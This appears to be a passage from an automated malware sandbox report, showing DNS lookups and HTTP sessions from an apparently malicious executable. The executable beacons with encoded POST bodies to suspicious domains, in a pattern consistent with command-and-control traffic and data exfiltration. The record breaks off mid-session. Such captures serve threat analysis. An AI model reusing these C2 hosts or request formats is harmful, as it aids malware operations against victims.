                                                                                                                              Nov 2, 2024 08:13:37.127196074 CET1.1.1.1192.168.2.40xff36No error (0)www.zoptra.info162.0.211.143A (IP address)IN (0x0001)false
                                                                                                                              Nov 2, 2024 08:13:50.649485111 CET1.1.1.1192.168.2.40x2a7fNo error (0)www.nutrigenfit.onlinenutrigenfit.onlineCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Nov 2, 2024 08:13:50.649485111 CET1.1.1.1192.168.2.40x2a7fNo error (0)nutrigenfit.online195.110.124.133A (IP address)IN (0x0001)false
                                                                                                                              Nov 2, 2024 08:14:04.394450903 CET1.1.1.1192.168.2.40x4d48No error (0)www.redex.fun185.68.16.94A (IP address)IN (0x0001)false
                                                                                                                              Nov 2, 2024 08:14:18.740415096 CET1.1.1.1192.168.2.40x19ecNo error (0)www.broork.sbs163.44.176.12A (IP address)IN (0x0001)false
                                                                                                                              Nov 2, 2024 08:14:33.388525963 CET1.1.1.1192.168.2.40x54afNo error (0)www.deepfy.xyz199.59.243.227A (IP address)IN (0x0001)false
                                                                                                                              Nov 2, 2024 08:14:47.368329048 CET1.1.1.1192.168.2.40x91b2No error (0)www.cmdh1c.xyzofficial.roamimg.strawberrycdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Nov 2, 2024 08:14:47.368329048 CET1.1.1.1192.168.2.40x91b2No error (0)official.roamimg.strawberrycdn.com103.233.82.58A (IP address)IN (0x0001)false
                                                                                                                              Nov 2, 2024 08:15:03.336184978 CET1.1.1.1192.168.2.40xd522No error (0)www.beautyconcernsusa.netbeautyconcernsusa.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Nov 2, 2024 08:15:03.336184978 CET1.1.1.1192.168.2.40xd522No error (0)beautyconcernsusa.net216.219.93.17A (IP address)IN (0x0001)false

                                                                                                                              HTTP Request Dependency Graph

                                                                                                                              • www.litsgs.vip
                                                                                                                              • www.7wkto5nk230724z.click
                                                                                                                              • www.roopiedutech.online
                                                                                                                              • www.suree.bet
                                                                                                                              • www.bocadolobopetra.net
                                                                                                                              • www.44kdd.top
                                                                                                                              • www.dbasky.net
                                                                                                                              • www.zoptra.info
                                                                                                                              • www.nutrigenfit.online
                                                                                                                              • www.redex.fun
                                                                                                                              • www.broork.sbs
                                                                                                                              • www.deepfy.xyz
                                                                                                                              • www.cmdh1c.xyz

                                                                                                                              HTTP Packets

                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              0192.168.2.4654583.33.130.190803512C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 2, 2024 08:11:47.532429934 CET523OUTGET /a1y9/?SJuP9=UPQLWRgHAD_&Z0WTZ=iZz4I3W5iLJGfbtGmZ2CObwfByBiroJddzdGuVUGr5fdVP/mU/ghPDmzUyOVJzAbJgU0ueO9BFeqSkyyfz76yiSG65EDj9rJsjZ/uDCtsUVT8Sp7eRbdwLE= HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.litsgs.vip
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                              Nov 2, 2024 08:11:48.186441898 CET399INHTTP/1.1 200 OK
                                                                                                                              Server: openresty
                                                                                                                              Date: Sat, 02 Nov 2024 07:11:48 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 259
                                                                                                                              Connection: close
                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 53 4a 75 50 39 3d 55 50 51 4c 57 52 67 48 41 44 5f 26 5a 30 57 54 5a 3d 69 5a 7a 34 49 33 57 35 69 4c 4a 47 66 62 74 47 6d 5a 32 43 4f 62 77 66 42 79 42 69 72 6f 4a 64 64 7a 64 47 75 56 55 47 72 35 66 64 56 50 2f 6d 55 2f 67 68 50 44 6d 7a 55 79 4f 56 4a 7a 41 62 4a 67 55 30 75 65 4f 39 42 46 65 71 53 6b 79 79 66 7a 37 36 79 69 53 47 36 35 45 44 6a 39 72 4a 73 6a 5a 2f 75 44 43 74 73 55 56 54 38 53 70 37 65 52 62 64 77 4c 45 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?SJuP9=UPQLWRgHAD_&Z0WTZ=iZz4I3W5iLJGfbtGmZ2CObwfByBiroJddzdGuVUGr5fdVP/mU/ghPDmzUyOVJzAbJgU0ueO9BFeqSkyyfz76yiSG65EDj9rJsjZ/uDCtsUVT8Sp7eRbdwLE="}</script></head></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              1192.168.2.465495172.67.131.32803512C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 2, 2024 08:12:03.285598040 CET810OUTPOST /c2q3/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.7wkto5nk230724z.click
                                                                                                                              Origin: http://www.7wkto5nk230724z.click
                                                                                                                              Referer: http://www.7wkto5nk230724z.click/c2q3/
                                                                                                                              Content-Length: 202
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-cache
                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                              Data Raw: 5a 30 57 54 5a 3d 75 39 63 47 71 39 4f 79 46 70 64 31 46 59 56 5a 74 59 59 4e 6d 51 77 4a 6d 35 6a 73 6a 7a 75 67 79 4c 4a 66 6b 6b 42 50 79 50 73 63 43 57 31 74 55 6f 31 74 73 53 50 52 4f 59 64 52 2f 63 47 61 77 77 78 5a 4f 37 59 51 74 62 2b 73 52 37 31 52 31 5a 35 78 64 30 4c 36 68 74 59 6a 58 41 30 57 42 57 43 73 77 33 77 74 79 6d 61 6b 66 76 73 7a 30 75 6b 67 55 41 73 6f 4f 75 6a 4c 57 44 71 31 45 68 46 71 7a 79 6a 4d 4d 44 72 74 76 52 73 74 58 6d 6f 2b 57 41 42 4b 55 72 4e 34 6e 57 4c 35 31 50 51 4b 6a 67 67 33 51 61 34 4c 6c 42 64 71 6b 68 70 57 45 67 53 53 33 44 77 41 66 39 43 79 2b 67 3d 3d
                                                                                                                              Data Ascii: Z0WTZ=u9cGq9OyFpd1FYVZtYYNmQwJm5jsjzugyLJfkkBPyPscCW1tUo1tsSPROYdR/cGawwxZO7YQtb+sR71R1Z5xd0L6htYjXA0WBWCsw3wtymakfvsz0ukgUAsoOujLWDq1EhFqzyjMMDrtvRstXmo+WABKUrN4nWL51PQKjgg3Qa4LlBdqkhpWEgSS3DwAf9Cy+g==
                                                                                                                              Nov 2, 2024 08:12:03.991750002 CET906INHTTP/1.1 404 Not Found
                                                                                                                              Date: Sat, 02 Nov 2024 07:12:03 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N8qld3sJZua8iW44eBacmyrVtdW1%2B69AqDPd3JsInJMXWWTtZldHzWToibszvZ6J9eRZ1pcNgMz48DxSPRvFXL9g76BjQjF9rgNLjF7U%2BPVvSjgs3ai%2BtfWHwig8%2FiEhjFF%2FAHC74KjjnEKT"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8dc25067df724761-DFW
                                                                                                                              Content-Encoding: gzip
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1875&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=810&delivery_rate=0&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a 36 33 0d 0a b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a
                                                                                                                              Data Ascii: f63(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a3
                                                                                                                              Nov 2, 2024 08:12:03.991781950 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              2192.168.2.465510172.67.131.32803512C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 2, 2024 08:12:05.831248999 CET830OUTPOST /c2q3/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.7wkto5nk230724z.click
                                                                                                                              Origin: http://www.7wkto5nk230724z.click
                                                                                                                              Referer: http://www.7wkto5nk230724z.click/c2q3/
                                                                                                                              Content-Length: 222
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-cache
                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                              Data Raw: 5a 30 57 54 5a 3d 75 39 63 47 71 39 4f 79 46 70 64 31 46 35 46 5a 75 2f 73 4e 6b 77 77 4f 34 70 6a 73 73 54 75 6b 79 4c 46 66 6b 6c 30 45 78 39 49 63 42 7a 52 74 56 73 5a 74 35 53 50 52 47 34 64 4a 31 38 47 42 77 77 30 6b 4f 36 6b 51 74 62 36 73 52 2b 5a 52 31 75 56 77 50 55 4b 63 30 39 5a 46 59 67 30 57 42 57 43 73 77 33 31 6c 79 6d 69 6b 66 66 63 7a 33 4d 4d 6e 61 67 73 6e 47 4f 6a 4c 63 6a 71 78 45 68 46 59 7a 77 58 6d 4d 46 6e 74 76 51 63 74 55 7a 63 2f 59 41 42 45 61 4c 4d 30 6f 57 75 6a 31 2b 56 6c 6e 6a 6c 58 64 61 6f 4f 67 48 51 77 31 51 49 42 57 67 32 68 71 45 35 30 53 2b 2f 37 6c 6f 30 72 33 54 33 75 71 61 45 62 6d 6c 49 6b 57 4b 30 4d 6e 53 55 3d
                                                                                                                              Data Ascii: Z0WTZ=u9cGq9OyFpd1F5FZu/sNkwwO4pjssTukyLFfkl0Ex9IcBzRtVsZt5SPRG4dJ18GBww0kO6kQtb6sR+ZR1uVwPUKc09ZFYg0WBWCsw31lymikffcz3MMnagsnGOjLcjqxEhFYzwXmMFntvQctUzc/YABEaLM0oWuj1+VlnjlXdaoOgHQw1QIBWg2hqE50S+/7lo0r3T3uqaEbmlIkWK0MnSU=
                                                                                                                              Nov 2, 2024 08:12:06.533761978 CET901INHTTP/1.1 404 Not Found
                                                                                                                              Date: Sat, 02 Nov 2024 07:12:06 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w2woxl0lr2wvLQ83ITpXepXG2emJEoBc1c3dXr2ldsCtuSkOtQL3GS6CR%2FjMsWErS1qXNRCBo2G6vcdlTRyxt2W4TNF15y4P4%2BxmVfQkjEPv5anSWIcLbg%2F2iousDYnSNcd%2F6n8sng7D4wQ%2F"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8dc25077cacb4864-DFW
                                                                                                                              Content-Encoding: gzip
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1244&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=830&delivery_rate=0&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              3192.168.2.465522172.67.131.32803512C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 2, 2024 08:12:08.378828049 CET10912OUTPOST /c2q3/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.7wkto5nk230724z.click
                                                                                                                              Origin: http://www.7wkto5nk230724z.click
                                                                                                                              Referer: http://www.7wkto5nk230724z.click/c2q3/
                                                                                                                              Content-Length: 10302
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-cache
                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                              Data Raw: 5a 30 57 54 5a 3d 75 39 63 47 71 39 4f 79 46 70 64 31 46 35 46 5a 75 2f 73 4e 6b 77 77 4f 34 70 6a 73 73 54 75 6b 79 4c 46 66 6b 6c 30 45 78 39 41 63 43 46 64 74 56 4e 5a 74 2f 69 50 52 61 6f 64 4b 31 38 47 41 77 30 67 6f 4f 36 6f 41 74 64 6d 73 54 59 4e 52 7a 63 74 77 45 55 4b 63 73 4e 5a 52 58 41 31 57 42 57 53 6f 77 33 46 6c 79 6d 69 6b 66 5a 34 7a 6a 4f 6b 6e 58 41 73 6f 4f 75 6a 58 57 44 72 6d 45 68 63 76 7a 77 44 63 4d 31 48 74 75 77 4d 74 48 31 41 2f 55 41 42 52 64 4c 4e 70 6f 57 54 39 31 36 31 44 6e 67 34 41 64 59 30 4f 68 7a 52 4b 6b 52 6c 66 45 53 36 63 35 47 64 48 61 75 33 38 38 34 41 57 77 68 54 30 79 61 77 4b 72 43 6f 68 4d 36 77 77 7a 69 70 62 41 2b 79 31 6a 4e 61 59 55 77 55 5a 61 49 6a 57 66 43 4f 45 67 50 47 44 5a 4d 50 35 46 74 6d 72 6b 45 35 4d 41 48 74 39 76 50 36 2b 59 37 57 4c 4a 4a 78 53 4e 4c 32 51 44 57 70 67 6e 67 55 46 56 45 64 77 64 62 33 72 56 37 64 61 36 49 77 64 6e 67 5a 4f 74 71 47 7a 2b 50 7a 55 47 67 38 6b 76 67 65 34 46 59 57 33 64 68 78 54 61 34 71 56 48 30 49 73 [TRUNCATED]
                                                                                                                              Data Ascii: Z0WTZ=u9cGq9OyFpd1F5FZu/sNkwwO4pjssTukyLFfkl0Ex9AcCFdtVNZt/iPRaodK18GAw0goO6oAtdmsTYNRzctwEUKcsNZRXA1WBWSow3FlymikfZ4zjOknXAsoOujXWDrmEhcvzwDcM1HtuwMtH1A/UABRdLNpoWT9161Dng4AdY0OhzRKkRlfES6c5GdHau3884AWwhT0yawKrCohM6wwzipbA+y1jNaYUwUZaIjWfCOEgPGDZMP5FtmrkE5MAHt9vP6+Y7WLJJxSNL2QDWpgngUFVEdwdb3rV7da6IwdngZOtqGz+PzUGg8kvge4FYW3dhxTa4qVH0IswzioBbqVNyRQWlJPcGxj7xn1XJvjRj/vZlbrMXN6FyiizgbUb1XiioZ67tWwzAC861CCZhBV56HJbT5VVRhX8a4HsCcF9gwoWAkQTFLYxKpdMPK7etlh4GfPDOb/f4pKbTSw7muB/g3YO/f/Pgk2HF62lMpiymRXWZCepUTQ28KSd/pUzkfAHDUkehn4QxpM4oh1PUa8XhzLZI7OK8+JIfM/3igQinooR1jYRdJ7SD8z7azZfgHIHSBFFTsTRD2awhkyRaQclj5AP9Wi8dHvAMLGX9O1BXKoH1CMDrTVKgLJVFDqdrflkc+k1Dsq5dYeWS4OfadSncou2VoFQeA8BfwTG557ACfiKy+JtSO3e6+QdoMbpeN5U5ztZHFWK47f4d3lKsKZGAbWfxGQ7dgGtuqLTzFhCwKFT13AkFDVgfZAz3d6T1fOhFUjqzSlZgv1eP9lS/Mnwqr8mK3s16vpK6vayc7pbeNFFe1npR8di3B+Rk6d+5QR7efqIUsw8KWOzpCzQ29EV+lXmnDmBTeq3YSXhSlR3PI1Bd3gxchBT138zndsjyLo/a0wXQ+sGS8xWkQHQz2eEvUR9weRz7YJIZo0HW40hTF8e/v0px6gYzGxFo6/IIL4eClxILqHEauoZk59H2UKRa6ZXI+S+tHauvcHj/FJwRRwyi [TRUNCATED]
                                                                                                                              Nov 2, 2024 08:12:09.069901943 CET906INHTTP/1.1 404 Not Found
                                                                                                                              Date: Sat, 02 Nov 2024 07:12:09 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YS9iQrxk9Uupw0402lvDL8x%2FW23y8bn4ehSLQm%2Bd%2FYCYlPS4Z3LZvL0M2gkiVUtHr1U9tgYBLvmN%2BqXN0CFIejZq9wMraSZ%2FLkqGdQ5h2dMLncpNEw6Fph2%2FnCHqVhGUGqKUxnYkmq5t8PQN"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8dc25087a9552cdc-DFW
                                                                                                                              Content-Encoding: gzip
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1400&sent=4&recv=11&lost=0&retrans=0&sent_bytes=0&recv_bytes=10912&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              4192.168.2.449155172.67.131.32803512C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 2, 2024 08:12:10.923604965 CET534OUTGET /c2q3/?Z0WTZ=j/0mpNm2Bsp7DIZ0lL93uSEy3O7+v2qbjKVTngZW+fxoFlp5b+1ximLQJstL0djCplBlCo8niZKHcOIqzu0BFGSn0M5MS0dRMByh0HJ4/jaoTuMehM4oDS0=&SJuP9=UPQLWRgHAD_ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.7wkto5nk230724z.click
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                              Nov 2, 2024 08:12:11.647187948 CET909INHTTP/1.1 404 Not Found
                                                                                                                              Date: Sat, 02 Nov 2024 07:12:11 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OGqw%2BUFdXC2mDbOXxkbO%2FFXG5NQNNCzFDlz%2FPTyJQhqJFOen2iZf3EQWOr9%2Fo8cclF0QlbjY9%2BCuEooVoASZBHQcK0480xOckZuJpIrTJygysMNCqWLxaGoybH8xFLyeAcSpjvjkNcAL7HZK"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8dc25097b8262857-DFW
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1649&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=534&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                                                                              Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                                                                                                              Nov 2, 2024 08:12:11.647202015 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              5192.168.2.449191103.191.208.137803512C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 2, 2024 08:12:17.490432024 CET804OUTPOST /w5is/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.roopiedutech.online
                                                                                                                              Origin: http://www.roopiedutech.online
                                                                                                                              Referer: http://www.roopiedutech.online/w5is/
                                                                                                                              Content-Length: 202
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-cache
                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                              Data Raw: 5a 30 57 54 5a 3d 4b 5a 71 41 50 4c 30 36 4f 49 39 4f 79 4b 68 32 66 78 47 62 43 4a 72 6a 57 7a 34 6a 51 53 44 46 4d 37 2b 32 59 49 39 62 6d 56 44 76 69 57 66 75 34 43 38 2b 58 69 64 4c 56 76 47 38 6d 7a 7a 6d 36 42 59 4c 4a 74 5a 7a 33 61 79 4f 38 43 2f 66 77 31 39 68 35 64 4e 4d 6f 50 4a 37 68 4b 71 30 77 2b 54 61 36 6e 76 54 39 30 7a 77 52 46 79 2f 47 79 6e 64 59 64 77 51 64 6d 72 31 2f 61 33 44 72 4a 77 38 35 43 57 67 57 48 37 37 71 55 74 34 54 51 64 66 6e 31 76 58 67 71 73 6d 48 69 78 6a 36 75 6a 6d 70 4e 59 31 50 50 65 61 33 42 49 4d 57 7a 76 74 45 35 6c 64 59 6a 49 76 42 62 42 6b 59 41 3d 3d
                                                                                                                              Data Ascii: Z0WTZ=KZqAPL06OI9OyKh2fxGbCJrjWz4jQSDFM7+2YI9bmVDviWfu4C8+XidLVvG8mzzm6BYLJtZz3ayO8C/fw19h5dNMoPJ7hKq0w+Ta6nvT90zwRFy/GyndYdwQdmr1/a3DrJw85CWgWH77qUt4TQdfn1vXgqsmHixj6ujmpNY1PPea3BIMWzvtE5ldYjIvBbBkYA==


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              6192.168.2.449207103.191.208.137803512C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 2, 2024 08:12:20.044430017 CET824OUTPOST /w5is/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.roopiedutech.online
                                                                                                                              Origin: http://www.roopiedutech.online
                                                                                                                              Referer: http://www.roopiedutech.online/w5is/
                                                                                                                              Content-Length: 222
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-cache
                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
